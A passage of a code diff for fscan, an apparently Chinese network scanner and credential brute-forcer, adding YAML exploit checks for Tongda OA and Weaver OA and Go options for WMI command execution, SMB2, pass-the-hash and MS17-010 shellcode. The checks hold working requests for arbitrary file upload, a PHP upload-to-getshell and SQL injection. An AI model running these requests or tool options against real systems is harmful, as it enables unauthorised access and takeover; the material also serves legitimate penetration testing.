+        通达OA v11.7 中存在某接口查询在线用户，当用户在线时会返回 PHPSESSION使其可登录后台系统
+    links:
+        - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.7%20auth_mobi.php%20%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
+        - https://www.cnblogs.com/T0uch/p/14475551.html
+        - https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/
--- a/WebScan/pocs/tongda-v2017-uploadfile.yml
+++ b/WebScan/pocs/tongda-v2017-uploadfile.yml
@@ -0,0 +1,50 @@
+name: tongda-v2017-uploadfile
+set:
+  rand1: randomLowercase(12)
+  fileContent: randomLowercase(12)
+rules:
+  - method: POST
+    path: /module/ueditor/php/action_upload.php?action=uploadfile
+    headers:
+      Content-Type: multipart/form-data; boundary=55719851240137822763221368724
+    body: |
+      -----------------------------55719851240137822763221368724
+      Content-Disposition: form-data; name="CONFIG[fileFieldName]"
+
+      ffff
+      -----------------------------55719851240137822763221368724
+      Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
+
+      1000000000
+      -----------------------------55719851240137822763221368724
+      Content-Disposition: form-data; name="CONFIG[filePathFormat]"
+
+      tcmd
+      -----------------------------55719851240137822763221368724
+      Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
+
+      .txt
+      -----------------------------55719851240137822763221368724
+      Content-Disposition: form-data; name="ffff"; filename="{{rand1}}.txt"
+      Content-Type: application/octet-stream
+
+      {{fileContent}}
+      -----------------------------55719851240137822763221368724
+      Content-Disposition: form-data; name="mufile"
+
+      submit
+      -----------------------------55719851240137822763221368724--
+    expression: |
+      response.status == 200
+  - method: GET
+    path: /{{rand1}}.txt
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(fileContent))
+detail:
+  author: zan8in
+  description: |
+    通达OA v2017 action_upload.php 任意文件上传漏洞
+    通达OA v2017 action_upload.php 文件过滤不足且无需后台权限，导致任意文件上传漏洞
+    app="TDXK-通达OA"
+  links:
+    - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
--- a/WebScan/pocs/weaver-E-Cology-getSqlData-sqli.yml
+++ b/WebScan/pocs/weaver-E-Cology-getSqlData-sqli.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-weaver-E-Cology-getSqlData-sqli
+rules:
+  - method: GET
+    path: /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b'Microsoft SQL Server')
+
+detail:
+  author: PeiQi0
+  links:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  tags: weaver,sqli
--- a/WebScan/pocs/weaver-oa-eoffice-v9-upload-getshell.yml
+++ b/WebScan/pocs/weaver-oa-eoffice-v9-upload-getshell.yml
@@ -0,0 +1,25 @@
+name: poc-yaml-weaver-oa-eoffice-v9-upload-getshell
+manual: true
+transport: http
+set:
+    r1: randomLowercase(8)
+rules:
+  - method: POST
+    path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
+    headers:
+        Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
+    body: |-
+        --e64bdf16c554bbc109cecef6451c26a4
+        Content-Disposition: form-data; name="Filedata"; filename="test.php"
+        Content-Type: image/jpeg
+        {{r1}}
+        --e64bdf16c554bbc109cecef6451c26a4--
+    expression: response.status == 200 && response.body.bcontains(b"logo-eoffice.php")
+  - method: GET
+    path: /images/logo/logo-eoffice.php
+    follow_redirects: true
+    expression: response.status == 200 && response.body.bcontains(bytes(r1))
+detail:
+    author: szd790056181
+    links:
+        - http://www.ctfiot.com/13682.html
--- a/common/Parse.go
+++ b/common/Parse.go
@@ -2,8 +2,10 @@ package common

 import (
 	"bufio"
+	"encoding/hex"
 	"flag"
 	"fmt"
+	"net/url"
 	"os"
 	"os/exec"
 	"path/filepath"
@@ -12,19 +14,19 @@ import (
 )

 func Parse(Info *HostInfo) {
-	ParseUser(Info)
+	ParseUser()
 	ParsePass(Info)
 	ParseInput(Info)
 	ParseScantype(Info)
 }

-func ParseUser(Info *HostInfo) {
-	if Info.Username == "" && Userfile == "" {
+func ParseUser() {
+	if Username == "" && Userfile == "" {
 		return
 	}
-
-	if Info.Username != "" {
-		Info.Usernames = strings.Split(Info.Username, ",")
+	var Usernames []string
+	if Username != "" {
+		Usernames = strings.Split(Username, ",")
 	}

 	if Userfile != "" {
@@ -32,37 +34,50 @@ func ParseUser(Info *HostInfo) {
 		if err == nil {
 			for _, user := range users {
 				if user != "" {
-					Info.Usernames = append(Info.Usernames, user)
+					Usernames = append(Usernames, user)
 				}
 			}
 		}
 	}

-	Info.Usernames = RemoveDuplicate(Info.Usernames)
+	Usernames = RemoveDuplicate(Usernames)
 	for name := range Userdict {
-		Userdict[name] = Info.Usernames
+		Userdict[name] = Usernames
 	}
 }

 func ParsePass(Info *HostInfo) {
-	if Info.Password != "" {
-		passs := strings.Split(Info.Password, ",")
+	var PwdList []string
+	if Password != "" {
+		passs := strings.Split(Password, ",")
 		for _, pass := range passs {
 			if pass != "" {
-				Info.Passwords = append(Info.Passwords, pass)
+				PwdList = append(PwdList, pass)
 			}
 		}
-		Passwords = Info.Passwords
+		Passwords = PwdList
 	}
 	if Passfile != "" {
 		passs, err := Readfile(Passfile)
 		if err == nil {
 			for _, pass := range passs {
 				if pass != "" {
-					Info.Passwords = append(Info.Passwords, pass)
+					PwdList = append(PwdList, pass)
+				}
+			}
+			Passwords = PwdList
+		}
+	}
+	if URL != "" {
+		urls := strings.Split(URL, ",")
+		TmpUrls := make(map[string]struct{})
+		for _, url := range urls {
+			if _, ok := TmpUrls[url]; !ok {
+				TmpUrls[url] = struct{}{}
+				if url != "" {
+					Urls = append(Urls, url)
 				}
 			}
-			Passwords = Info.Passwords
 		}
 	}
 	if UrlFile != "" {
@@ -122,16 +137,19 @@ func ParseInput(Info *HostInfo) {
 	if BruteThread <= 0 {
 		BruteThread = 1
 	}
+
 	if TmpOutputfile != "" {
-		if !strings.Contains(Outputfile, "/") && !strings.Contains(Outputfile, `\`) {
+		if !strings.Contains(TmpOutputfile, "/") && !strings.Contains(TmpOutputfile, `\`) {
 			Outputfile = getpath() + TmpOutputfile
 		} else {
 			Outputfile = TmpOutputfile
 		}
 	}
+
 	if TmpSave == true {
 		IsSave = false
 	}
+
 	if Info.Ports == DefaultPorts {
 		Info.Ports += "," + Webport
 	}
@@ -146,7 +164,7 @@ func ParseInput(Info *HostInfo) {

 	if UserAdd != "" {
 		user := strings.Split(UserAdd, ",")
-		for a, _ := range Userdict {
+		for a := range Userdict {
 			Userdict[a] = append(Userdict[a], user...)
 			Userdict[a] = RemoveDuplicate(Userdict[a])
 		}
@@ -157,17 +175,72 @@ func ParseInput(Info *HostInfo) {
 		Passwords = append(Passwords, pass...)
 		Passwords = RemoveDuplicate(Passwords)
 	}
+	if Socks5Proxy != "" && !strings.HasPrefix(Socks5Proxy, "socks5://") {
+		if !strings.Contains(Socks5Proxy, ":") {
+			Socks5Proxy = "socks5://127.0.0.1" + Socks5Proxy
+		} else {
+			Socks5Proxy = "socks5://" + Socks5Proxy
+		}
+	}
+	if Socks5Proxy != "" {
+		fmt.Println("Socks5Proxy:", Socks5Proxy)
+		_, err := url.Parse(Socks5Proxy)
+		if err != nil {
+			fmt.Println("Socks5Proxy parse error:", err)
+			os.Exit(0)
+		}
+		NoPing = true
+	}
+	if Proxy != "" {
+		if Proxy == "1" {
+			Proxy = "http://127.0.0.1:8080"
+		} else if Proxy == "2" {
+			Proxy = "socks5://127.0.0.1:1080"
+		} else if !strings.Contains(Proxy, "://") {
+			Proxy = "http://127.0.0.1:" + Proxy
+		}
+		fmt.Println("Proxy:", Proxy)
+		if !strings.HasPrefix(Proxy, "socks") && !strings.HasPrefix(Proxy, "http") {
+			fmt.Println("no support this proxy")
+			os.Exit(0)
+		}
+		_, err := url.Parse(Proxy)
+		if err != nil {
+			fmt.Println("Proxy parse error:", err)
+			os.Exit(0)
+		}
+	}
+
+	if Hash != "" && len(Hash) != 32 {
+		fmt.Println("[-] Hash is error,len(hash) must be 32")
+		os.Exit(0)
+	} else {
+		var err error
+		HashBytes, err = hex.DecodeString(Hash)
+		if err != nil {
+			fmt.Println("[-] Hash is error,hex decode error")
+			os.Exit(0)
+		}
+	}
 }

 func ParseScantype(Info *HostInfo) {
-	_, ok := PORTList[Info.Scantype]
+	_, ok := PORTList[Scantype]
 	if !ok {
 		showmode()
 	}
-	if Info.Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
-		switch Info.Scantype {
-		case "rdp":
-			Info.Ports = "3389"
+	if Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
+		switch Scantype {
+		case "wmiexec":
+			Info.Ports = "135"
+		case "wmiinfo":
+			Info.Ports = "135"
+		case "smbinfo":
+			Info.Ports = "445"
+		case "hostname":
+			Info.Ports = "135,137,139,445"
+		case "smb2":
+			Info.Ports = "445"
 		case "web":
 			Info.Ports = Webport
 		case "webonly":
@@ -181,10 +254,10 @@ func ParseScantype(Info *HostInfo) {
 		case "main":
 			Info.Ports = DefaultPorts
 		default:
-			port, _ := PORTList[Info.Scantype]
+			port, _ := PORTList[Scantype]
 			Info.Ports = strconv.Itoa(port)
 		}
-		fmt.Println("-m ", Info.Scantype, " start scan the port:", Info.Ports)
+		fmt.Println("-m ", Scantype, " start scan the port:", Info.Ports)
 	}
 }

--- a/common/ParseIP.go
+++ b/common/ParseIP.go
@@ -13,8 +13,6 @@ import (
 	"strings"
 )

-var IsIPRange bool
-
 var ParseIPErr = errors.New(" host parsing error\n" +
 	"format: \n" +
 	"192.168.1.1\n" +
@@ -57,7 +55,7 @@ func ParseIP(host string, filename string, nohosts ...string) (hosts []string, e
 		}
 	}
 	hosts = RemoveDuplicate(hosts)
-	if len(hosts) == 0 && host != "" && filename != "" {
+	if len(hosts) == 0 && len(HostPort) == 0 && host != "" && filename != "" {
 		err = ParseIPErr
 	}
 	return
@@ -188,10 +186,23 @@ func Readipfile(filename string) ([]string, error) {
 	scanner := bufio.NewScanner(file)
 	scanner.Split(bufio.ScanLines)
 	for scanner.Scan() {
-		text := strings.TrimSpace(scanner.Text())
-		if text != "" {
-			host := ParseIPs(text)
-			content = append(content, host...)
+		line := strings.TrimSpace(scanner.Text())
+		if line != "" {
+			text := strings.Split(line, ":")
+			if len(text) == 2 {
+				port := strings.Split(text[1], " ")[0]
+				num, err := strconv.Atoi(port)
+				if err != nil || (num < 1 || num > 65535) {
+					continue
+				}
+				hosts := ParseIPs(text[0])
+				for _, host := range hosts {
+					HostPort = append(HostPort, fmt.Sprintf("%s:%s", host, port))
+				}
+			} else {
+				host := ParseIPs(line)
+				content = append(content, host...)
+			}
 		}
 	}
 	return content, nil
--- a/common/config.go
+++ b/common/config.go
@@ -1,6 +1,6 @@
 package common

-var version = "1.7.1"
+var version = "1.8.2"
 var Userdict = map[string][]string{
 	"ftp":        {"ftp", "admin", "www", "web", "root", "db", "wwwroot", "data"},
 	"mysql":      {"root", "mysql"},
@@ -32,7 +32,10 @@ var PORTList = map[string]int{
 	"ms17010":     1000001,
 	"cve20200796": 1000002,
 	"web":         1000003,
-	"webonly":     10000031,
+	"webonly":     1000003,
+	"webpoc":      1000003,
+	"smb2":        1000004,
+	"wmiexec":     1000005,
 	"all":         0,
 	"portscan":    0,
 	"icmp":        0,
@@ -45,44 +48,31 @@ var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,
 var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"

 type HostInfo struct {
-	Host      string
-	Ports     string
-	Domain    string
-	Url       string
-	Path      string
-	Timeout   int64
-	Scantype  string
-	Command   string
-	SshKey    string
-	Username  string
-	Password  string
-	Usernames []string
-	Passwords []string
-	Infostr   []string
-	Hash      string
+	Host    string
+	Ports   string
+	Url     string
+	Infostr []string
 }

 type PocInfo struct {
-	Num        int
-	Rate       int
-	Timeout    int64
-	Proxy      string
-	PocName    string
-	PocDir     string
-	Target     string
-	TargetFile string
-	RawFile    string
-	Cookie     string
-	ForceSSL   bool
-	ApiKey     string
-	CeyeDomain string
+	Target  string
+	PocName string
 }

 var (
+	Path          string
+	Scantype      string
+	Command       string
+	SshKey        string
+	Domain        string
+	Username      string
+	Password      string
+	Proxy         string
+	Timeout       int64 = 3
+	WebTimeout    int64 = 5
 	TmpOutputfile string
 	TmpSave       bool
-	IsPing        bool
-	IsWmi         bool
+	NoPing        bool
 	Ping          bool
 	Pocinfo       PocInfo
 	IsWebCan      bool
@@ -107,4 +97,19 @@ var (
 	BruteThread   int
 	LiveTop       int
 	Socks5Proxy   string
+	Hash          string
+	HashBytes     []byte
+	HostPort      []string
+	IsWmi         bool
+)
+
+var (
+	UserAgent  = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
+	Accept     = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
+	DnsLog     bool
+	PocNum     int
+	PocFull    bool
+	CeyeDomain string
+	ApiKey     string
+	Cookie     string
 )
--- a/common/flag.go
+++ b/common/flag.go
@@ -2,8 +2,25 @@ package common

 import (
 	"flag"
+	"runtime"
+	"runtime/debug"
+	"time"
 )

+func init() {
+	go func() {
+		for {
+			GC()
+			time.Sleep(10 * time.Second)
+		}
+	}()
+}
+
+func GC() {
+	runtime.GC()
+	debug.FreeOSMemory()
+}
+
 func Banner() {
 	banner := `
   ___                              _    
@@ -25,14 +42,14 @@ func Flag(Info *HostInfo) {
 	flag.StringVar(&UserAdd, "usera", "", "add a user base DefaultUsers,-usera user")
 	flag.StringVar(&PassAdd, "pwda", "", "add a password base DefaultPasses,-pwda password")
 	flag.StringVar(&NoPorts, "pn", "", "the ports no scan,as: -pn 445")
-	flag.StringVar(&Info.Command, "c", "", "exec command (ssh)")
-	flag.StringVar(&Info.SshKey, "sshkey", "", "sshkey file (id_rsa)")
-	flag.StringVar(&Info.Domain, "domain", "", "smb domain")
-	flag.StringVar(&Info.Username, "user", "", "username")
-	flag.StringVar(&Info.Password, "pwd", "", "password")
-	flag.Int64Var(&Info.Timeout, "time", 3, "Set timeout")
-	flag.StringVar(&Info.Scantype, "m", "all", "Select scan type ,as: -m ssh")
-	flag.StringVar(&Info.Path, "path", "", "fcgi、smb romote file path")
+	flag.StringVar(&Command, "c", "", "exec command (ssh|wmiexec)")
+	flag.StringVar(&SshKey, "sshkey", "", "sshkey file (id_rsa)")
+	flag.StringVar(&Domain, "domain", "", "smb domain")
+	flag.StringVar(&Username, "user", "", "username")
+	flag.StringVar(&Password, "pwd", "", "password")
+	flag.Int64Var(&Timeout, "time", 3, "Set timeout")
+	flag.StringVar(&Scantype, "m", "all", "Select scan type ,as: -m ssh")
+	flag.StringVar(&Path, "path", "", "fcgi、smb romote file path")
 	flag.IntVar(&Threads, "t", 600, "Thread nums")
 	flag.IntVar(&LiveTop, "top", 10, "show live len top")
 	flag.StringVar(&HostFile, "hf", "", "host file, -hf ip.txt")
@@ -45,19 +62,23 @@ func Flag(Info *HostInfo) {
 	flag.BoolVar(&IsWebCan, "nopoc", false, "not to scan web vul")
 	flag.BoolVar(&IsBrute, "nobr", false, "not to Brute password")
 	flag.IntVar(&BruteThread, "br", 1, "Brute threads")
-	flag.BoolVar(&IsPing, "np", false, "not to ping")
+	flag.BoolVar(&NoPing, "np", false, "not to ping")
 	flag.BoolVar(&Ping, "ping", false, "using ping replace icmp")
 	flag.StringVar(&TmpOutputfile, "o", "result.txt", "Outputfile")
 	flag.BoolVar(&TmpSave, "no", false, "not to save output log")
 	flag.Int64Var(&WaitTime, "debug", 60, "every time to LogErr")
 	flag.BoolVar(&Silent, "silent", false, "silent scan")
+	flag.BoolVar(&PocFull, "full", false, "poc full scan,as: shiro 100 key")
 	flag.StringVar(&URL, "u", "", "url")
 	flag.StringVar(&UrlFile, "uf", "", "urlfile")
 	flag.StringVar(&Pocinfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic")
-	flag.StringVar(&Pocinfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
+	flag.StringVar(&Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
 	flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work")
-	flag.StringVar(&Pocinfo.Cookie, "cookie", "", "set poc cookie")
-	flag.Int64Var(&Pocinfo.Timeout, "wt", 5, "Set web timeout")
-	flag.IntVar(&Pocinfo.Num, "num", 20, "poc rate")
+	flag.StringVar(&Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login")
+	flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout")
+	flag.BoolVar(&DnsLog, "dns", false, "using dnslog poc")
+	flag.IntVar(&PocNum, "num", 20, "poc rate")
+	flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
+	flag.BoolVar(&IsWmi, "wmi", false, "start wmi")
 	flag.Parse()
 }
--- a/common/log.go
+++ b/common/log.go
@@ -19,6 +19,7 @@ var Silent bool
 var LogWG sync.WaitGroup

 func init() {
+	LogSucTime = time.Now().Unix()
 	go SaveLog()
 }

--- a/go.mod
+++ b/go.mod
@@ -3,22 +3,27 @@ module github.com/shadow1ng/fscan
 go 1.16

 require (
-	github.com/denisenkom/go-mssqldb v0.11.0
+	github.com/C-Sto/goWMIExec v0.0.1-deva.0.20210704154847-b8ebd6464a06
+	github.com/denisenkom/go-mssqldb v0.12.2
 	github.com/go-sql-driver/mysql v1.6.0
 	github.com/golang/protobuf v1.3.4
 	github.com/google/cel-go v0.6.0
+	github.com/hirochachacha/go-smb2 v1.1.0
 	github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358 // indirect
-	github.com/jlaffaye/ftp v0.0.0-20211117213618-11820403398b
-	github.com/lib/pq v1.10.4
-	github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca
-	github.com/sijms/go-ora/v2 v2.2.16
+	github.com/jlaffaye/ftp v0.0.0-20220630165035-11536801d1ff
+	github.com/lib/pq v1.10.6
+	github.com/satori/go.uuid v1.2.0
+	github.com/sijms/go-ora/v2 v2.4.28
 	github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8
 	github.com/tomatome/grdp v0.0.0-20211231062539-be8adab7eaf3
 	golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a
-	golang.org/x/net v0.0.0-20210226172049-e18ecbb05110
-	golang.org/x/text v0.3.3
+	golang.org/x/net v0.0.0-20210610132358-84b48f89b13b
+	golang.org/x/text v0.3.6
 	google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0
-	gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b
+	gopkg.in/yaml.v2 v2.4.0
+	gopkg.in/yaml.v3 v3.0.1
 )

 replace github.com/tomatome/grdp v0.0.0-20211231062539-be8adab7eaf3 => github.com/shadow1ng/grdp v1.0.3
+
+replace github.com/C-Sto/goWMIExec v0.0.1-deva.0.20210704154847-b8ebd6464a06 => github.com/shadow1ng/goWMIExec v0.0.2
--- a/go.sum
+++ b/go.sum
@@ -11,6 +11,10 @@ cloud.google.com/go/firestore v1.1.0/go.mod h1:ulACoGHTpvq5r8rxGJ4ddJZBZqakUQqCl
 cloud.google.com/go/pubsub v1.0.1/go.mod h1:R0Gpsv3s54REJCy4fxDixWD93lHJMoZTyQ2kNxGRt3I=
 cloud.google.com/go/storage v1.0.0/go.mod h1:IhtSnM/ZTZV8YYJWCY8RULGVqBDmpoyjwiyrjsg+URw=
 dmitri.shuralyov.com/gpu/mtl v0.0.0-20190408044501-666a987793e9/go.mod h1:H6x//7gZCb22OMCxBHrMx7a5I7Hp++hsVxbQ4BYO7hU=
+github.com/Azure/azure-sdk-for-go/sdk/azcore v0.19.0/go.mod h1:h6H6c8enJmmocHUbLiiGY6sx7f9i+X3m1CHdd5c6Rdw=
+github.com/Azure/azure-sdk-for-go/sdk/azidentity v0.11.0/go.mod h1:HcM1YX14R7CJcghJGOYCgdezslRSVzqwLf/q+4Y2r/0=
+github.com/Azure/azure-sdk-for-go/sdk/internal v0.7.0/go.mod h1:yqy467j36fJxcRV2TzfVZ1pCb5vxm4BtZPUdYWe/Xo8=
+github.com/BurntSushi/toml v0.3.1 h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=
 github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
 github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo=
 github.com/OneOfOne/xxhash v1.2.2/go.mod h1:HSdplMjZKSmBqAxg5vPj2TmRDmfkzw+cTzAElWljhcU=
@@ -37,15 +41,18 @@ github.com/cpuguy83/go-md2man/v2 v2.0.0/go.mod h1:maD7wRr/U5Z6m/iR4s+kqSMx2CaBsr
 github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
 github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
-github.com/denisenkom/go-mssqldb v0.11.0 h1:9rHa233rhdOyrz2GcP9NM+gi2psgJZ4GWDpL/7ND8HI=
-github.com/denisenkom/go-mssqldb v0.11.0/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU=
+github.com/denisenkom/go-mssqldb v0.12.2 h1:1OcPn5GBIobjWNd+8yjfHNIaFX14B1pWI3F9HZy5KXw=
+github.com/denisenkom/go-mssqldb v0.12.2/go.mod h1:lnIw1mZukFRZDJYQ0Pb833QS2IaC3l5HkEfra2LJ+sk=
 github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ=
 github.com/dgryski/go-sip13 v0.0.0-20181026042036-e10d5fee7954/go.mod h1:vAd38F8PWV+bWy6jNmig1y/TA+kYO4g3RSRF0IAv0no=
+github.com/dnaeon/go-vcr v1.2.0/go.mod h1:R4UdLID7HZT3taECzJs4YgbbH6PIGXB6W/sc5OLb6RQ=
 github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
 github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c=
 github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
 github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
 github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ=
+github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w=
+github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc=
 github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
 github.com/go-gl/gl v0.0.0-20181026044259-55b76b7df9d2/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
 github.com/go-gl/gl v0.0.0-20190320180904-bf2b1f2f34d7/go.mod h1:482civXOzJJCPzJ4ZOX/pwvXBWSnzD4OKMdH4ClKGbk=
@@ -63,6 +70,8 @@ github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7a
 github.com/gogo/protobuf v1.2.1/go.mod h1:hp+jE20tsWTFYpLwKvXlhS1hjn+gTNwPg2I6zVXpSg4=
 github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY=
 github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0=
+github.com/golang-sql/sqlexp v0.1.0 h1:ZCD6MBpcuOVfGVqsEmY5/4FtYiKz6tSyUv9LPEDei6A=
+github.com/golang-sql/sqlexp v0.1.0/go.mod h1:J4ad9Vo8ZCWQ2GMrC4UCQy1JpCbwU9m3EOqtpKwwwHI=
 github.com/golang/freetype v0.0.0-20170609003504-e2365dfdc4a0/go.mod h1:E/TSTwGwJL78qG/PmXZO1EjYhfJinVAhrmmHX6Z8B9k=
 github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58=
 github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q=
@@ -105,11 +114,14 @@ github.com/grpc-ecosystem/go-grpc-prometheus v1.2.0/go.mod h1:8NvIoxWQoOIhqOTXgf
 github.com/grpc-ecosystem/grpc-gateway v1.9.0/go.mod h1:vNeuVxBJEsws4ogUvrchl83t/GYV9WGTSLVdBhOQFDY=
 github.com/hashicorp/consul/api v1.1.0/go.mod h1:VmuI/Lkw1nC05EYQWNKwWGbkg+FbDBtguAZLlVdkD9Q=
 github.com/hashicorp/consul/sdk v0.1.1/go.mod h1:VKf9jXwCTEY1QZP2MOLRhb5i/I/ssyNV1vwHyQBF0x8=
+github.com/hashicorp/errwrap v1.0.0 h1:hLrqtEDnRye3+sgx6z4qVLNuviH3MR5aQ0ykNJa/UYA=
 github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4=
 github.com/hashicorp/go-cleanhttp v0.5.1/go.mod h1:JpRdi6/HCYpAwUzNwuwqhbovhLtngrth3wmdIIUrZ80=
 github.com/hashicorp/go-immutable-radix v1.0.0/go.mod h1:0y9vanUI8NX6FsYoO3zeMjhV/C5i9g4Q3DwcSNZ4P60=
 github.com/hashicorp/go-msgpack v0.5.3/go.mod h1:ahLV/dePpqEmjfWmKiqvPkv/twdG7iPBM1vqhUKIvfM=
 github.com/hashicorp/go-multierror v1.0.0/go.mod h1:dHtQlpGsu+cZNNAkkCN/P3hoUDHhCYQXV3UM06sGGrk=
+github.com/hashicorp/go-multierror v1.1.1 h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo=
+github.com/hashicorp/go-multierror v1.1.1/go.mod h1:iw975J/qwKPdAO1clOe2L8331t/9/fmwbPZ6JB6eMoM=
 github.com/hashicorp/go-rootcerts v1.0.0/go.mod h1:K6zTfqpRlCUIjkwsN4Z+hiSfzSTQa6eBIzfwKfwNnHU=
 github.com/hashicorp/go-sockaddr v1.0.0/go.mod h1:7Xibr9yA9JjQq1JpNB2Vw7kxv8xerXegt+ozgdvDeDU=
 github.com/hashicorp/go-syslog v1.0.0/go.mod h1:qPfqrKkXGihmCqbJM2mZgkZGvKG1dFdvsLplgctolz4=
@@ -123,13 +135,15 @@ github.com/hashicorp/logutils v1.0.0/go.mod h1:QIAnNjmIWmVIIkWDTG1z5v++HQmx9WQRO
 github.com/hashicorp/mdns v1.0.0/go.mod h1:tL+uN++7HEJ6SQLQ2/p+z2pH24WQKWjBPkE0mNTz8vQ=
 github.com/hashicorp/memberlist v0.1.3/go.mod h1:ajVTdAv/9Im8oMAAj5G31PhhMCZJV2pPBoIllUwCN7I=
 github.com/hashicorp/serf v0.8.2/go.mod h1:6hOLApaqBFA1NXqRQAsxw9QxuDEvNxSQRwA/JwenrHc=
+github.com/hirochachacha/go-smb2 v1.1.0 h1:b6hs9qKIql9eVXAiN0M2wSFY5xnhbHAQoCwRKbaRTZI=
+github.com/hirochachacha/go-smb2 v1.1.0/go.mod h1:8F1A4d5EZzrGu5R7PU163UcMRDJQl4FtcxjBfsY8TZE=
 github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358 h1:hVXNJ57IHkOA8FBq80UG263MEBwNUMfS9c82J2QE5UQ=
 github.com/huin/asn1ber v0.0.0-20120622192748-af09f62e6358/go.mod h1:qBE210J2T9uLXRB3GNc73SvZACDEFAmDCOlDkV47zbY=
